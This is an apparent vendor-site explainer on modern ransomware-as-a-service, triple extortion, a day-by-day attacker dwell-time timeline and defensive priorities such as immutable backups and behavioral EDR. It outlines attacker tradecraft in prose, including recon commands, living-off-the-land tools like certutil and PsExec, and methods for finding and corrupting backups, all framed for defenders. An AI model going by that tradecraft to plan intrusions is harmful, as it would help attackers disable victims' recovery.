Why did "just restore from backup" stop working?
For a decade, the standard advice for ransomware was straightforward: maintain good backups, test your restores, and you can tell the attackers to go away. This advice is now dangerously outdated. Not because backups are unimportant - they are still essential - but because modern ransomware operators adapted their business model specifically to neutralize backup-based recovery.
TL;DR:
- Average ransomware dwell time is 21 days; attackers explicitly map and target backup infrastructure before detonation.
- Triple extortion adds DDoS, direct customer notification, and regulatory complaints on top of encryption and data theft.
- Implement immutable backups with authentication separate from Domain Admin; behavioral EDR to catch living-off-the-land techniques.
The ransomware landscape in 2026 does not resemble the spray-and-pray campaigns of 2018. What we are dealing with is an organized criminal industry with revenue splits, affiliate programs, customer support, and product development cycles. Understanding the mechanics of this industry is the only way to build defenses that actually work.
How does Ransomware-as-a-Service actually operate?
RaaS operates on an affiliate model that would be familiar to anyone who has studied franchise businesses. The core operators - groups like the LockBit lineage, BlackCat/ALPHV successors, and newer entrants - develop and maintain the ransomware tooling. They provide the encryption software, negotiation platforms, data leak sites, and operational infrastructure.
Affiliates are the operators who actually breach networks and deploy the ransomware. They bring their own initial access methods - purchased credentials, phishing campaigns, exploitation of exposed services - and use the RaaS platform's tools for the final stages of the attack. The revenue split typically runs 70/30 or 80/20 in favor of the affiliate, though top-performing affiliates can negotiate better terms.
This model has several implications that defenders need to understand.
First, the barrier to entry is low. An affiliate does not need to write ransomware, build negotiation infrastructure, or manage cryptocurrency wallets. They need initial access skills and basic operational security. The RaaS platform handles everything else. This means the number of active threat actors is far larger than the number of ransomware "groups" that appear in threat intelligence reports.
Second, the tooling is constantly improving. Core operators reinvest profits into development, just like a legitimate software company. LockBit 3.0 introduced features like anti-analysis protections, configurable encryption speeds (faster encryption means less time for detection), and automated lateral movement capabilities. Each generation is harder to detect and faster to execute than the last.
Third, competition between RaaS platforms drives innovation. When one group introduces a new extortion technique, others adopt it within months. The market dynamics are identical to legitimate SaaS competition, except the product is extortion.
What exactly is triple extortion and why does it change the math?
Single extortion was simple: encrypt the data, demand payment for the decryption key. Backups defeated this. So attackers evolved.
Double extortion added data exfiltration. Before encrypting, the attackers copy sensitive data to their infrastructure. Even if you restore from backup, they threaten to publish your customer data, financial records, source code, or internal communications. This is where "just restore from backup" started failing - restoration does not un-steal data.
Triple extortion adds additional pressure vectors on top of encryption and data theft. The third vector varies: DDoS attacks against your public-facing infrastructure while you are already struggling with the encryption, direct contact with your customers or business partners to inform them their data was stolen (weaponizing your business relationships), regulatory pressure by reporting your data breach to authorities before you can manage the disclosure, or targeting your clients and suppliers as secondary victims.
The mechanics of triple extortion are designed to eliminate every alternative to payment. Cannot restore from backup because your data is already exfiltrated. Cannot quietly manage the incident because the attackers are telling your customers. Cannot wait them out because DDoS is taking down your revenue-generating systems. Cannot negotiate slowly because they are filing regulatory complaints that create legal deadlines.
Each additional extortion vector increases the cost of non-payment while the ransom demand stays the same. The economics are deliberately structured to make payment the rational choice.
What happens during those 21 days of dwell time?
The average dwell time - the period between initial access and ransomware deployment - is approximately 21 days in 2026. Some operations are faster, some much longer. But understanding what happens during this period is critical because it is your only real detection window.
Days 1-3: Initial access and foothold. The affiliate gains access through a compromised VPN credential, an unpatched public-facing application, or a phishing email. They establish persistence - typically a reverse shell, a web shell, or a compromised remote access tool. The first action is almost always reconnaissance: whoami, ipconfig, net group "Domain Admins". These commands are legitimate tools used by legitimate administrators, which is exactly the problem.
Days 3-7: Lateral movement. The attacker moves through the network using living-off-the-land techniques. PsExec for remote execution. WMIC for system queries. Certutil for downloading additional tools (disguised as certificate operations). PowerShell for everything else. None of these trigger antivirus alerts because they are built-in Windows tools used by IT teams daily. The attacker maps the Active Directory environment, identifies high-value targets, and escalates privileges - often to Domain Admin within the first week.
Days 7-14: Preparation. This is where the attack specifically targets your recovery capabilities. The attacker identifies backup systems, backup schedules, backup storage locations, and backup retention policies. They identify your security tools and test whether their encryption payload will be detected. They often disable or modify Volume Shadow Copies. They may compromise the backup system itself, so that your "clean" backups contain their persistence mechanisms.
Days 14-21: Exfiltration and staging. Sensitive data is copied to attacker-controlled infrastructure. The exfiltration often uses legitimate cloud services - files uploaded to Mega, Google Drive, or Azure Blob Storage - to blend with normal traffic. The ransomware payload is staged across multiple systems. The attacker configures the deployment to execute simultaneously across the entire environment.
Day 21: Detonation. The ransomware deploys, typically during off-hours - Friday evening, holiday weekend, early morning. Every prepared system encrypts simultaneously. Backup systems are encrypted first. Active Directory is targeted to maximize disruption. The ransom note appears.
Why are backups the first target, not the last?
Modern ransomware affiliates are explicitly trained to prioritize backup infrastructure. The playbooks shared on dark web forums include specific instructions for identifying and neutralizing backup systems.
The mechanics are straightforward. If you are running Veeam, the attacker looks for the Veeam console and its database, identifies the backup repositories, and either encrypts them or deletes the backup chains. If you use cloud-based backup, they look for stored credentials to the backup service. If you have offline or air-gapped backups, they try to identify when the air-gapped media is connected and time their attack to encrypt both production and the most recent backup simultaneously.
The anti-case here is brutal: an organization that invested heavily in backup infrastructure, tested restores quarterly, and believed they were ransomware-resilient. The attacker spent 47 days in the network - longer than average, specifically because the backup infrastructure was well-designed and required more time to map and compromise. By the time the ransomware deployed, the attacker had modified backup jobs to include encrypted copies of themselves, corrupted backup catalogs, and deleted the oldest backup chains that predated their access. The "clean" backups the organization restored from contained the attacker's persistence tools, leading to a second encryption event 11 days after the first.
Backups are necessary. Backups as your primary ransomware defense is a strategy that attackers have specifically engineered their operations to defeat.
What if the attacker knows your backup schedule better than your team does?
Imagine this: 47 days inside your network. The attacker has read every email from your IT team. They have watched your backup jobs execute on schedule. They know that your Veeam server runs full backups Sunday at 2 AM, incrementals every night at midnight, and that your tape rotation happens on the first Monday of each month. They know your retention policy keeps 30 days of disk-based backups and 90 days of tape.
They wait until Tuesday of the first week of a new month. The oldest tapes were just rotated out. The newest backup was last night. They encrypted the Veeam server, the backup repository, and every accessible tape. Your most recent clean backup is now 31 days old - beyond your disk retention. Your tapes from before the compromise are in a warehouse, but the catalog that tells you which tapes contain which data was on the Veeam server that is now encrypted.
You can rebuild from 31-day-old tapes, but you will lose a month of transactions, customer data, and work product. For a financial services firm, this is not just an inconvenience - it is a regulatory catastrophe. The cost of data reconstruction, regulatory fines, and customer notification exceeds the ransom demand by a factor of five.
This scenario is not theoretical. Variants of it appear in incident response reports regularly. The attacker's advantage is patience and total visibility into your environment.
Is paying the ransom actually rational?
Here is the controversial claim: in many cases, paying the ransom is the economically rational decision. This is not an endorsement - it is an observation about the math.
Consider an organization with $50 million in annual revenue. The ransomware has encrypted production systems, exfiltrated customer data, and DDoS attacks are taking down their website. The ransom demand is $2 million.
Cost of not paying: estimated 3-4 weeks of downtime ($3-4 million in lost revenue), incident response and recovery costs ($500K-$1M), customer notification and credit monitoring ($200K-$500K), regulatory fines for the data breach ($500K-$2M), reputational damage (unquantifiable but significant), potential lawsuits from affected customers ($1M+). Total: $5-8 million minimum.
Cost of paying: $2 million ransom, plus incident response costs are still necessary ($500K), plus you still need to address the data breach ($500K-$1M). Total: $3-3.5 million.
The math says pay. The FBI says do not pay. Insurance companies increasingly refuse to cover ransom payments. And there is no guarantee the decryption key works - roughly 80% of the time it does, but 80% is not 100%.
The rational response is not "never pay" or "always pay" - it is "build defenses that make this calculation unnecessary." But pretending that payment is never rational ignores the reality that executives face during an active incident.
What should the CTO prioritize?
The CTO needs to accept that ransomware defense is not about any single control. It is about increasing the cost and time required for the attacker at every stage.
Network segmentation that actually works - not just VLANs on a diagram, but enforced microsegmentation that prevents lateral movement from a compromised workstation to backup infrastructure. This is hard to implement and maintain, which is why most organizations do not actually do it.
Endpoint detection and response that catches living-off-the-land techniques. Traditional antivirus is useless against PsExec and PowerShell. You need behavioral detection that identifies suspicious patterns - a user account that has never used PsExec suddenly executing it on 50 machines at 3 AM.
Immutable backups that cannot be modified or deleted, even by an administrator with full access. This means backup infrastructure with separate authentication (not Domain Admin), air-gapped or append-only storage, and backup monitoring that alerts on unexpected deletion or modification.
| Tool | What it does | Complexity | Main weakness |
|---|---|---|---|
| SentinelOne | AI-driven EDR, automated response, ransomware rollback | Medium | Rollback only works for files modified after agent deployment |
| CrowdStrike | Cloud-native EDR, threat intelligence, managed hunting | Medium | Premium pricing, Falcon platform sprawl |
| Huntress | Managed EDR focused on SMB, persistent foothold detection | Low | Less suited for large enterprise environments |
| Fortinet | Network security, segmentation, integrated SD-WAN | High | Complexity of FortiOS ecosystem, integration overhead |
| Trellix | XDR platform, email security, endpoint protection | High | Post-merger integration issues, console fragmentation |
What does SecOps need to detect?
SecOps needs to shift from alert-based detection to pattern-based hunting. The individual actions in a ransomware attack are all legitimate activities. The pattern is what distinguishes an attack from normal operations.
A Domain Admin using PsExec is normal. A Domain Admin using PsExec on 200 machines in sequence at 2 AM is not. Certutil downloading a file is normal. Certutil downloading an executable from an external URL is not. PowerShell running scripts is normal. PowerShell running encoded commands that decode and execute in memory is suspicious.
The 21-day dwell time is actually an advantage for defenders - if you are looking. Most organizations are not, because their security operations are built around alert triage rather than threat hunting.
What does the CFO need to budget for?
The CFO needs to understand that ransomware risk is now a board-level financial risk, not an IT problem. The expected annual loss from ransomware for a mid-size enterprise is no longer theoretical - it is calculable from industry data.
Cyber insurance premiums have tripled since 2022, and underwriters now require specific controls before issuing policies. If your organization cannot demonstrate EDR deployment, MFA coverage, backup immutability, and network segmentation, you may not qualify for coverage at any price.
The budget conversation should include: EDR licensing ($15-30 per endpoint per month), network segmentation implementation ($200K-$500K for a mid-size environment), backup infrastructure upgrades ($100K-$300K), incident response retainer ($50K-$150K annually), and security operations staffing or managed detection and response ($200K-$500K annually).
This is expensive. A ransomware incident is more expensive. The CFO's job is to quantify both sides and present the board with an informed risk decision.
Compare Ransomware Defense Tools
EDR platforms vary significantly in detection coverage, response automation, and total cost. Compare before you decide:
- CrowdStrike vs SentinelOne - The two dominant enterprise EDR platforms
- Huntress vs CrowdStrike - SMB-focused vs enterprise
- Browse all endpoint security and EDR tools on ComparEdge
Ransomware defense requires layered investment. EDR alone is not enough without immutable backups and network segmentation.
Find the best tool for your use case: real pricing, user ratings, and feature comparisons for 508+ products.
Browse All Categories